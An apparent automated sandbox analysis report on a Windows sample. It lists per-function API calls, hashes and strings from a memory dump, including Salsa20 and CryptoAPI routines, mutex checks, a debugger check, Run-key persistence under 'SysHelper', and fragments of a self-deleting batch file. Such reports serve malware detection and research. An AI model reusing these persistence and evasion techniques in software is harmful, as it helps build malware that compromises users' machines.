                                                                                                • Instruction ID: e959444c36dd18fc08dff6604914d564c76187b82df2896015b22d61e5b1ffa1
                                                                                                • Opcode Fuzzy Hash: 8e7fd9746f064940cb66d6ef43538eded20f2cba022702fc4082d6d5591459cc
                                                                                                • Instruction Fuzzy Hash: 09B19F70D00208DBDF20DFA4D945BDEB7B5BF15308F50407AE40AAB291E7799A89CF5A
                                                                                                APIs
                                                                                                • _wcscmp.LIBCMT ref: 004382B9
                                                                                                • _wcscmp.LIBCMT ref: 004382CA
                                                                                                • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,00438568,?,00000000), ref: 004382E6
                                                                                                • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,00438568,?,00000000), ref: 00438310
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InfoLocale_wcscmp
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 1351282208-711371036
                                                                                                • Opcode ID: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                • Instruction ID: cf0fde08c92294f7ab6fed71b02f11d94bd2ad82eb759ef3fcb1a01a65759ec5
                                                                                                • Opcode Fuzzy Hash: 102afb5f5093c9dfdd8a19d426743dda05a0526c846065600ba6b69f24068785
                                                                                                • Instruction Fuzzy Hash: FA01C431200615ABDB205E59DC45FD77798AB18B54F10806BF908DA252EF79DA41C78C
                                                                                                APIs
                                                                                                Strings
                                                                                                • input != nullptr && output != nullptr, xrefs: 0040C095
                                                                                                • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0040C090
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: __wassert
                                                                                                • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                • API String ID: 3993402318-1975116136
                                                                                                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                • Instruction ID: 1562121ec4d7abfac7b8d7a3269f54288592c24a15d8ca99342f0f863a8d7c6a
                                                                                                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                                                                                                • Instruction Fuzzy Hash: 43C18C75E002599FCB54CFA9C885ADEBBF1FF48300F24856AE919E7301E334AA558B54
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 0042419D
                                                                                                • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 00424252
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DebuggerPresent_memset
                                                                                                • String ID: i;B
                                                                                                • API String ID: 2328436684-472376889
                                                                                                • Opcode ID: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                • Instruction ID: b2deef9000060817df5d9888a0c5d5c31052404ed3c7d79a7a675bf972ea9145
                                                                                                • Opcode Fuzzy Hash: 0bc333208f10a2510305f30f60194ffc8a1e9bc236dda87ca461c0d5e10d6844
                                                                                                • Instruction Fuzzy Hash: 3231D57591122C9BCB21DF69D9887C9B7B8FF08310F5042EAE80CA6251EB349F858F59
                                                                                                APIs
                                                                                                • CryptDestroyHash.ADVAPI32(?), ref: 00411190
                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 004111A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$ContextDestroyHashRelease
                                                                                                • String ID:
                                                                                                • API String ID: 3989222877-0
                                                                                                • Opcode ID: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                                                                                • Instruction ID: be51c898aa0ddf1eb2c7ddf255022cb250d4a78141f94ceb906d675081cd9b05
                                                                                                • Opcode Fuzzy Hash: 9f13d3873e772d8ace176f4c7e6ba3f69b1ad179b42c3e02a3fcf93c6db6df11
                                                                                                • Instruction Fuzzy Hash: F0E0EC74F40305A7EF50DBB6AC49FABB6A86B08745F444526FB04F3251D62CD841C528
                                                                                                APIs
                                                                                                • CryptDestroyHash.ADVAPI32(?), ref: 0040EA69
                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EA79
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$ContextDestroyHashRelease
                                                                                                • String ID:
                                                                                                • API String ID: 3989222877-0
                                                                                                • Opcode ID: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                                                                                • Instruction ID: d41dd3a2d1aa4a110fdd7d588524fe859ae41a35967fa473e5fd9fc866ad400b
                                                                                                • Opcode Fuzzy Hash: a8a50747f5b84a4213a2f30896a43f764b121f6b091d033cf5eb92e4ffb0f2c5
                                                                                                • Instruction Fuzzy Hash: B2E0EC78F002059BDF50DBB79C89F6B72A87B08744B440835F804F3285D63CD9118928
                                                                                                APIs
                                                                                                • CryptDestroyHash.ADVAPI32(?), ref: 0040EC80
                                                                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040EC90
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Crypt$ContextDestroyHashRelease
                                                                                                • String ID:
                                                                                                • API String ID: 3989222877-0
                                                                                                • Opcode ID: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                                                                                • Instruction ID: 275dd0b1ae59d7aa5d1c23d1b64c6eee76a350be21334d4cde6f8a02617c5264
                                                                                                • Opcode Fuzzy Hash: ea67dc9e2b6fd99e4d4b2082a3cd53fb6e3c794773a19c18e99169158be55dec
                                                                                                • Instruction Fuzzy Hash: 97E0BDB4F0420597EF60DEB69E49F6B76A8AB04645B440835E904F2281DA3DD8218A29
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00424266,?,?,?,00000001), ref: 004329F1
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004329FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
                                                                                                • Instruction ID: d7915fe9b98f2e2675b1eb18c11ae3c40c3bb41b36f5f7d781b256b54fe46c91
                                                                                                • Opcode Fuzzy Hash: 957f1cdd405d7a5f8fcfad9397a47528ed4c184e5d77963140c17adbcc220f91
                                                                                                • Instruction Fuzzy Hash: A7B09271044208ABDA802B93EC59F883F28EB04A62F084022F60D444628F6254508E99
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?,?,00431DA6,00431D5B), ref: 004329C1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
                                                                                                • Instruction ID: cc44753b31e70f30ed06b04cde14f86973f8491ae5a0d649e7a5859f7922213d
                                                                                                • Opcode Fuzzy Hash: 1db6f696b6536d5221d2cbd00a2ff6cb8be2218350df980964d78d67e6efdd32
                                                                                                • Instruction Fuzzy Hash: 69A0113000020CAB8A002B83EC088883F2CEA002A0B088022F80C008228B22A8208E88
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00423FED,00507990,00000014), ref: 004278D5
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: HeapProcess
                                                                                                • String ID:
                                                                                                • API String ID: 54951025-0
                                                                                                • Opcode ID: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                                                                                                • Instruction ID: c175dc67e46cb5b18e7b8d473ad54adbb7c8ff58e9170129aa5670ed77b5f39c
                                                                                                • Opcode Fuzzy Hash: 993d631f5fa9c6d26d39642974962185f27c3e068b68c4f08d438ea8c169c0b8
                                                                                                • Instruction Fuzzy Hash: 79B012F0705102474B480B387C9804935D47708305300407DF00BC11A0EF70C860BA08
                                                                                                APIs
                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004124FE
                                                                                                • GetLastError.KERNEL32 ref: 00412509
                                                                                                • CloseHandle.KERNEL32 ref: 0041251C
                                                                                                • CloseHandle.KERNEL32 ref: 00412539
                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00412550
                                                                                                • GetLastError.KERNEL32 ref: 0041255B
                                                                                                • CloseHandle.KERNEL32 ref: 0041256E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                • API String ID: 2372642624-488272950
                                                                                                • Opcode ID: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                • Instruction ID: b8d6f70f31989c1caf7dd59f8aefe182ce9601728b58fe5e15313657dd94e056
                                                                                                • Opcode Fuzzy Hash: 4506a078386c228e7a8f507305766ec05e664451a55683de5f3f64ca7fb9d614
                                                                                                • Instruction Fuzzy Hash: 03714E72940218AADF50ABE1DC89FEE7BACFB44305F0445A6F609D2090DF759A88CF64
                                                                                                APIs
                                                                                                • PostQuitMessage.USER32(00000000), ref: 0041BB49
                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 0041BBBA
                                                                                                • _malloc.LIBCMT ref: 0041BBE4
                                                                                                • GetComputerNameW.KERNEL32(00000000,?), ref: 0041BBF4
                                                                                                • _free.LIBCMT ref: 0041BCD7
                                                                                                  • Part of subcall function 00411CD0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D12
                                                                                                  • Part of subcall function 00411CD0: _memset.LIBCMT ref: 00411D3B
                                                                                                  • Part of subcall function 00411CD0: RegQueryValueExW.KERNEL32(?,SysHelper,00000000,?,?,00000400), ref: 00411D63
                                                                                                  • Part of subcall function 00411CD0: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004CAC68,000000FF), ref: 00411D6C
                                                                                                  • Part of subcall function 00411CD0: lstrlenA.KERNEL32(" --AutoStart,?,?), ref: 00411DD6
                                                                                                  • Part of subcall function 00411CD0: PathFileExistsW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,-00000001), ref: 00411E48
                                                                                                • IsWindow.USER32(?), ref: 0041BF69
                                                                                                • DestroyWindow.USER32(?), ref: 0041BF7B
                                                                                                • DefWindowProcW.USER32(?,00008003,?,?), ref: 0041BFA8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$Proc$CloseComputerDestroyExistsFileMessageNameOpenPathPostQueryQuitValue_free_malloc_memsetlstrlen
                                                                                                • String ID: pU
                                                                                                • API String ID: 3873257347-897878559
                                                                                                • Opcode ID: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                                                                                • Instruction ID: 866eb7db68ae170cd8e17be643faf7720e0ae735171854e0fa5cbc2bc792534d
                                                                                                • Opcode Fuzzy Hash: d87ae02ebb827c572a96defd0b94b563a2a13f3acd0a84997267fb9c98df2b66
                                                                                                • Instruction Fuzzy Hash: 85C19171508340AFDB20DF25DD45B9BBBE0FF85318F14492EF888863A1D7799885CB9A
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strncmp
                                                                                                • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                • API String ID: 909875538-2733969777
                                                                                                • Opcode ID: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                • Instruction ID: 696768b63e7695c6252fa4396c8fc8293dc5daf0279c077ed15b414a568efc74
                                                                                                • Opcode Fuzzy Hash: cb9e21a8909c22ae086980ad9bb3b6b683aca236df65bd2ad44c41cd33641913
                                                                                                • Instruction Fuzzy Hash: 82F1E7B16483806BE721EE25DC42F5B77D89F5470AF04082FF948D6283F678DA09879B
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                • String ID:
                                                                                                • API String ID: 1503006713-0
                                                                                                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                • Instruction ID: 8b5b6749b4f509f283f4592c8036b9fc340ac08d61b50d13b2524a40b9fdfb6a
                                                                                                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                                                                                                • Instruction Fuzzy Hash: 7E21B331705A21ABE7217F66B802E1F7FE4DF41728BD0442FF44459192EA39A800CA5D
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DecodePointer_write_multi_char_write_string$__aulldvrm__cftof_free_strlen
                                                                                                • String ID:
                                                                                                • API String ID: 559064418-0
                                                                                                • Opcode ID: 688c8fa77b64d3e6dd85923818a4fb75ab92d018343194e73b5bea7932078b8e
                                                                                                • Instruction ID: 14f77054e820437d32f524f0a61f308f331f5c30c1a6e174fa9440fd564cd740
                                                                                                • Opcode Fuzzy Hash: 688c8fa77b64d3e6dd85923818a4fb75ab92d018343194e73b5bea7932078b8e
                                                                                                • Instruction Fuzzy Hash: B8B1A171E092399FDF209B54EC88BAAB7B5EF54314F5400DAD908A6251D7389E80CF59
                                                                                                APIs
                                                                                                • DecodePointer.KERNEL32 ref: 00427B29
                                                                                                • _free.LIBCMT ref: 00427B42
                                                                                                  • Part of subcall function 00420BED: HeapFree.KERNEL32(00000000,00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C01
                                                                                                  • Part of subcall function 00420BED: GetLastError.KERNEL32(00000000,?,0042507F,00000000,0042520D,00420CE9), ref: 00420C13
                                                                                                • _free.LIBCMT ref: 00427B55
                                                                                                • _free.LIBCMT ref: 00427B73
                                                                                                • _free.LIBCMT ref: 00427B85
                                                                                                • _free.LIBCMT ref: 00427B96
                                                                                                • _free.LIBCMT ref: 00427BA1
                                                                                                • _free.LIBCMT ref: 00427BC5
                                                                                                • EncodePointer.KERNEL32(00558248), ref: 00427BCC
                                                                                                • _free.LIBCMT ref: 00427BE1
                                                                                                • _free.LIBCMT ref: 00427BF7
                                                                                                • _free.LIBCMT ref: 00427C1F
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 3064303923-0
                                                                                                • Opcode ID: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                • Instruction ID: d8036121d910c09816430481b6b6363fcbb95216f7cc64832fdbf6810ac9f003
                                                                                                • Opcode Fuzzy Hash: ce5aad9df44a4d959ab26dd18bbfc051b559e509faa5c70b1469206ba00ae6fa
                                                                                                • Instruction Fuzzy Hash: C2217535A042748BCB215F56BC80D4A7BA4EB14328B94453FEA14573A1CBF87889DA98
                                                                                                APIs
                                                                                                • CoInitialize.OLE32(00000000), ref: 00411BB0
                                                                                                • CoCreateInstance.OLE32(004CE908,00000000,00000001,004CD568,00000000), ref: 00411BC8
                                                                                                • CoUninitialize.OLE32 ref: 00411BD0
                                                                                                • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00411C12
                                                                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00411C22
                                                                                                • lstrcatW.KERNEL32(?,00500050), ref: 00411C3A
                                                                                                • lstrcatW.KERNEL32(?), ref: 00411C44
                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00411C68
                                                                                                • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00411C7A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                • String ID: \shell32.dll
                                                                                                • API String ID: 679253221-3783449302
                                                                                                • Opcode ID: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                • Instruction ID: 1ac700bd2dba931ae0f93f3cd35093afe8c3aec66b03df765643047a9f16b657
                                                                                                • Opcode Fuzzy Hash: 45e46fc2f9e137a48023c8b07f4e0b5fd5f09384ac33b8a62bbc2b8c253a451b
                                                                                                • Instruction Fuzzy Hash: 1D415E70A40209AFDB10CBA4DC88FEA7B7CEF44705F104499F609D7160D6B4AA45CB54
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,?,00000001,?,00454B72), ref: 004549C7
                                                                                                • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004549D7
                                                                                                • GetDesktopWindow.USER32 ref: 004549FB
                                                                                                • GetProcessWindowStation.USER32(?,00454B72), ref: 00454A01
                                                                                                • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,00454B72), ref: 00454A1C
                                                                                                • GetLastError.KERNEL32(?,00454B72), ref: 00454A2A
                                                                                                • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,00454B72), ref: 00454A65
                                                                                                • _wcsstr.LIBCMT ref: 00454A8A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                • String ID: Service-0x$_OPENSSL_isservice
                                                                                                • API String ID: 2112994598-1672312481
                                                                                                • Opcode ID: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                • Instruction ID: a4b3c478c226dd270820e71b951499fe23bca8177d071b610c32d3665965eb2a
                                                                                                • Opcode Fuzzy Hash: 839ece2f53d05b3d3a3b41915715d02d267126b8b76695ecb3f97597e52a1477
                                                                                                • Instruction Fuzzy Hash: 04312831A401049BCB10DBBAEC46AAE7778DFC4325F10426BFC19D72E1EB349D148B58
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F4,00454C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,0045480E,.\crypto\cryptlib.c,00000253,pointer != NULL,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454AFA
                                                                                                • GetFileType.KERNEL32(00000000,?,00451D37,00000000,0040CDAE,00000001,00000001), ref: 00454B05
                                                                                                • __vfwprintf_p.LIBCMT ref: 00454B27
                                                                                                  • Part of subcall function 0042BDCC: _vfprintf_helper.LIBCMT ref: 0042BDDF
                                                                                                • vswprintf.LIBCMT ref: 00454B5D
                                                                                                • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 00454B7E
                                                                                                • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 00454BA2
                                                                                                • DeregisterEventSource.ADVAPI32(00000000), ref: 00454BA9
                                                                                                • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 00454BD3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2053427513.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2053427513.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_400000_E609.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                • API String ID: 277090408-1348657634
                                                                                                • Opcode ID: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                • Instruction ID: 2d266f03b07cc91b1361f4b715b0612335af4cc100d4b249efeb6d9ab3704f8b
                                                                                                • Opcode Fuzzy Hash: 48266b123bee2effe3eea144965b75bbd91e26d62acab2e3a1446f4d096604c6
                                                                                                • Instruction Fuzzy Hash: 74210D716443006BD770A761DC47FEF77D8EF94704F80482EF699861D1EAB89444875B
                                                                                                APIs
                                                                                                • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00412389
